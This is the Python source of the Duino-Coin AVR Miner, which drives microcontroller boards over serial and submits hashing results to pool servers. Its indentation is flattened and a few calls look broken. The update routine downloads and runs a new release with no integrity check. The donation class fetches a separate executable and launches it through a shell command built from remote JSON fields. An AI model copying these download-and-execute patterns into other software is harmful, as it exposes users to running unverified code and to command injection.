# Python <3.6 check: this bare f-string raises a SyntaxError on older
# interpreters, so the miner fails fast with a readable message
f"Your Python version is too old. Duino-Coin Miner requires version 3.6 or above. Update your packages and try again"
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
try:
import psutil
except ModuleNotFoundError:
print("Psutil is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install psutil")
install("psutil")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '3.5'
SOC_TIMEOUT = 15
REPORT_TIME = 120
AVR_TIMEOUT = 10
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
TEMP_FOLDER = "Temp"
try:
# Raspberry Pi latin users can't display this character
"‖".encode(sys.stdout.encoding)
BLOCK = " ‖ "
except:
BLOCK = " | "
PICK = ""
COG = " @"
if (osname != "nt"
or bool(osname == "nt"
and os.environ.get("WT_SESSION"))):
# Windows' cmd does not support emojis, shame!
        # Some encodings don't support them either, for example Latin-1
try:
"⛏ ⚙".encode(sys.stdout.encoding) # if the terminal support emoji
PICK = " ⛏"
COG = " ⚙"
except UnicodeEncodeError: # else
PICK = ""
COG = " @"
def check_updates():
"""
Function that checks if the miner is updated.
Downloads the new version and restarts the miner.
"""
try:
data = requests.get(
"https://api.github.com/repos/revoxhere/duino-coin/releases/latest"
).json()
zip_file = "Duino-Coin_" + data["tag_name"] + "_linux.zip"
if sys.platform == "win32":
zip_file = "Duino-Coin_" + data["tag_name"] + "_windows.zip"
process = psutil.Process(os.getpid())
        running_script = False  # True when running from the .py script rather than a bundled executable
if "python" in process.name():
running_script = True
if float(Settings.VER) < float(data["tag_name"]): # If is outdated
update = input(Style.BRIGHT + get_string("new_version"))
if update == "Y" or update == "y":
pretty_print("sys0", get_string("updating"), "warning")
DATA_DIR = "Duino-Coin AVR Miner " + str(data["tag_name"]) # Create new version config folder
if not path.exists(DATA_DIR):
mkdir(DATA_DIR)
try:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg') # read the previous config
config["AVR Miner"] = {
'username': config["AVR Miner"]['username'],
'avrport': config["AVR Miner"]['avrport'],
'donate': int(config["AVR Miner"]['donate']),
'language': config["AVR Miner"]['language'],
'identifier': config["AVR Miner"]['identifier'],
'debug': config["AVR Miner"]['debug'],
"soc_timeout": int(config["AVR Miner"]["soc_timeout"]),
"avr_timeout": float(config["AVR Miner"]["avr_timeout"]),
"discord_presence": config["AVR Miner"]["discord_presence"],
"periodic_report": int(config["AVR Miner"]["periodic_report"]),
"mining_key": config["AVR Miner"]["mining_key"]
}
with open(str(DATA_DIR) # save it on the new version folder
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
pretty_print("sys0", Style.RESET_ALL + get_string('config_saved'), "success")
except Exception as e:
pretty_print("sys0", f"Error saving configfile: {e}" + str(e), "error")
pretty_print("sys0", "Config won't be carried to the next version", "warning")
if not os.path.exists(Settings.TEMP_FOLDER): # Make the Temp folder
os.makedirs(Settings.TEMP_FOLDER)
file_path = os.path.join(Settings.TEMP_FOLDER, zip_file)
download_url = "https://github.com/revoxhere/duino-coin/releases/download/" + data["tag_name"] + "/" + zip_file
if running_script:
file_path = os.path.join(".", "AVR_Miner_"+data["tag_name"]+".py")
download_url = "https://raw.githubusercontent.com/revoxhere/duino-coin/master/AVR_Miner.py"
r = requests.get(download_url, stream=True)
if r.ok:
start = time()
dl = 0
file_size = int(r.headers["Content-Length"]) # Get file size
pretty_print("sys0",
f"Saving update to: {os.path.abspath(file_path)}", "warning")
with open(file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024 * 8): # Download file in chunks
if chunk:
dl += len(chunk)
done = int(50 * dl / file_size)
dl_perc = str(int(100 * dl / file_size))
if running_script:
done = int(12.5 * dl / file_size)
dl_perc = str(int(22.5 * dl / file_size))
sys.stdout.write(
"\r%s [%s%s] %s %s" % (
dl_perc + "%",
'#' * done,
' ' * (50-done),
str(round(os.path.getsize(file_path) / 1024 / 1024, 2)) + " MB ",
str((dl // (time() - start)) // 1024) + " KB/s")) # ProgressBar
sys.stdout.flush()
f.write(chunk)
f.flush()
os.fsync(f.fileno())
pretty_print("sys0", "Download complete", "success")
if not running_script:
pretty_print("sys0", "Unpacking archive", "warning")
with zipfile.ZipFile(file_path, 'r') as zip_ref: # Unzip the file
for file in zip_ref.infolist():
if "AVR_Miner" in file.filename:
if sys.platform == "win32":
file.filename = "AVR_Miner_"+data["tag_name"]+".exe" # Rename the file
else:
file.filename = "AVR_Miner_"+data["tag_name"]
zip_ref.extract(file, ".")
pretty_print("sys0", "Unpacking complete", "success")
os.remove(file_path) # Delete the zip file
os.rmdir(Settings.TEMP_FOLDER) # Delete the temp folder
if sys.platform == "win32":
os.startfile(os.getcwd() + "\\AVR_Miner_"+data["tag_name"]+".exe") # Start the miner
else: # os.startfile is only for windows
os.system(os.getcwd() + "/AVR_Miner_"+data["tag_name"])
else:
if sys.platform == "win32":
os.system(file_path)
else:
os.system("python3 " + file_path)
sys.exit() # Exit the program
else: # HTTP status code 4XX/5XX
pretty_print( "sys0", f"Update failed: {r.status_code}: {r.text}", "error")
else:
pretty_print("sys0", "Update aborted", "warning")
except Exception as e:
print(e)
sys.exit()
def check_mining_key(user_settings):
user_settings = user_settings["AVR Miner"]
if user_settings["mining_key"] != "None":
key = "&k=" + b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = ''
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + user_settings["username"]
+ key,
timeout=10
).json()
if response["success"] and not response["has_key"]: # if the user doesn't have a mining key
user_settings["mining_key"] = "None"
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
return
if not response["success"]:
if user_settings["mining_key"] == "None":
pretty_print(
"sys0",
get_string("mining_key_required"),
"warning")
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
check_mining_key(config)
else:
pretty_print(
"sys0",
get_string("invalid_mining_key"),
"error")
retry = input("Do you want to retry? (y/n): ")
if retry == "y" or retry == "Y":
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
check_mining_key(config)
else:
return
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", get_string("connection_search"),
"info")
try:
response = requests.get(
"https://server.duinocoin.com/getPool",
timeout=10).json()
if response["success"] == True:
pretty_print("net0", get_string("connecting_node")
+ response["name"],
"info")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
if "Expecting value" in str(e):
pretty_print("net0", get_string("node_picker_unavailable")
+ f"15s {Style.RESET_ALL}({e})",
"warning")
else:
pretty_print("net0", get_string("node_picker_error")
+ f"15s {Style.RESET_ALL}({e})",
"error")
sleep(15)
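def _client_roundtrip_sketch(pool):
    """
    Hedged usage sketch (not part of the original miner): the basic
    connect / recv / send flow that mine_avr() uses below, where `pool`
    is the (ip, port) tuple returned by Client.fetch_pool().
    """
    s = Client.connect(pool)
    server_version = Client.recv(s, 6)
    Client.send(s, "MOTD")
    motd = Client.recv(s, 1024)
    return server_version, motd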
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
donation_settings = requests.get(
"https://server.duinocoin.com/donations/settings.json").json()
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ f'-o {donation_settings["url"]} '
+ f'-u {donation_settings["user"]} '
+ f'-p {donation_settings["pwd"]} '
+ f'-s 4 -e {donation_level*2}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate '
+ f'-o {donation_settings["url"]} '
+ f'-u {donation_settings["user"]} '
+ f'-p {donation_settings["pwd"]} '
+ f'-s 4 -e {donation_level*2}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'error')
shares = [0, 0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url, timeout=5)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('de'):
lang = 'german'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('jp'):
lang = 'japanese'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('it'):
lang = 'italian'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
elif locale.startswith('az'):
lang = 'azerbaijani'
elif locale.startswith('nl'):
lang = 'dutch'
elif locale.startswith('ko'):
lang = 'korean'
elif locale.startswith("id"):
lang = "indonesian"
elif locale.startswith("cz"):
lang = "czech"
elif locale.startswith("fi"):
lang = "finnish"
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
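# A small worked illustration of the prefix helper (not part of the original
# miner): 1,234,000 H/s with 2-digit accuracy formats as "1.23 MH/s", while a
# sub-kilo value keeps the plain unit.
def _get_prefix_example():
    assert get_prefix("H/s", 1_234_000, 2) == "1.23 MH/s"
    assert get_prefix("H/s", 950, 0) == "950 H/s"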
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
try:
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
except Exception as e:
print(e)
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global hashrate_list
global debug
global rig_identifier
global discord_presence
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
correct_username = False
while not correct_username:
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz"])
r = requests.get(f"https://server.duinocoin.com/users/{username}",
timeout=Settings.SOC_TIMEOUT).json()
correct_username = r["success"]
if not correct_username:
print(get_string("incorrect_username"))
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + username, timeout=10
).json()
mining_key = "None"
if response["has_key"]:
mining_key = input(Style.RESET_ALL + Fore.YELLOW
+ get_string("ask_mining_key")
+ Fore.RESET + Style.BRIGHT)
mining_key = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
rig_identifier = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
confirm_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if confirm_identifier == 'y' or confirm_identifier == 'Y':
current_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
rig_identifier += current_identifier
else:
rig_identifier += "None"
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
rig_identifier += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 10,
"discord_presence": "y",
"periodic_report": 60,
"mining_key": mining_key}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
rig_identifier = rig_identifier.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
hashrate_list = [0] * len(avrport)
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier'].split(',')
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
hashrate_list = [0] * len(avrport)
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2023')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ', '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string("using_config")
+ Style.BRIGHT + Fore.YELLOW
+ str(Settings.DATA_DIR + '/Settings.cfg'))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(905158274490441808)
RPC.connect()
Thread(target=update_rich_presence).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate_list), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(shares[0]) + "/"
+ str(shares[0] + shares[1])
+ " accepted shares",
large_image="avrminer",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
print("Error updating Discord RPC thread: " + str(e))
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
else:
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "info":
fg_color = Fore.BLUE
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping, reject_cause=None):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
if reject_cause:
share_str += f"{Style.NORMAL}({reject_cause}) "
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.MAGENTA
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool, thread_rigid):
global hashrate
start_time = time()
report_shares = 0
last_report_share = 0
while True:
shares = [0, 0, 0]
while True:
try:
ser.close()
pretty_print('sys' + port_num(com),
f"No response from the board. Closed port {com}",
'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=int(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
get_string("motd") + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
# Perform a hash test to assign the starting diff
prev_hash = "ba29a15896fd2d792d5c4b60668bf2b9feebc51d"
exp_hash = "d0beba883d7e8cd119ea2b0e09b78f60f29e0968"
exp_result = 50
retries = 0
while retries < 3:
try:
debug_output(com + ': Sending hash test to the board')
ser.write(bytes(str(prev_hash
+ Settings.SEPARATOR
+ exp_hash
+ Settings.SEPARATOR
+ "10"
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading hash test from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
else:
raise Exception("No data received from the board")
if int(result[0], 2) != exp_result:
raise Exception(com + f': Incorrect result received!')
computetime = round(int(result[1], 2) / 1000000, 5)
num_res = int(result[0], 2)
hashrate_test = round(num_res / computetime, 2)
break
except Exception as e:
debug_output(str(e))
retries += 1
else:
pretty_print('sys' + port_num(com),
f"Can't start mining on {com}" + Fore.RESET
+ f" - board keeps responding improperly. "
+ "Check if the code has been uploaded correctly "
+ "and your device is supported by Duino-Coin.",
'error')
break
start_diff = "AVR"
if hashrate_test > 12000:
start_diff = "ESP32"
elif hashrate_test > 6000:
start_diff = "ESP8266H"
elif hashrate_test > 4500:
start_diff = "ESP8266"
elif hashrate_test > 1000:
start_diff = "DUE"
elif hashrate_test > 520:
start_diff = "ARM"
elif hashrate_test > 370:
start_diff = "MEGA"
pretty_print('sys' + port_num(com),
get_string('hashrate_test')
+ get_prefix("H/s", hashrate_test, 2)
+ Fore.RESET
+ get_string('hashrate_test_diff')
+ start_diff)
while True:
try:
if config["AVR Miner"]["mining_key"] != "None":
key = b64.b64decode(config["AVR Miner"]["mining_key"]).decode()
else:
key = config["AVR Miner"]["mining_key"]
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ start_diff
+ Settings.SEPARATOR
+ str(key)
)
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
ser.flush()
retry_counter += 1
continue
if retry_counter > 3:
break
try:
computetime = round(int(result[1], 2) / 1000000, 5)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
hashrate_list[threadid] = hashrate
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(thread_rigid)
+ Settings.SEPARATOR
+ str(result[2]))
                responsetimestart = now()
feedback = Client.recv(s, 64).split(",")
responsetimestop = now()
                time_delta = (responsetimestop - responsetimestart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {" ".join(feedback)}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback[0] == 'GOOD':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BLOCK':
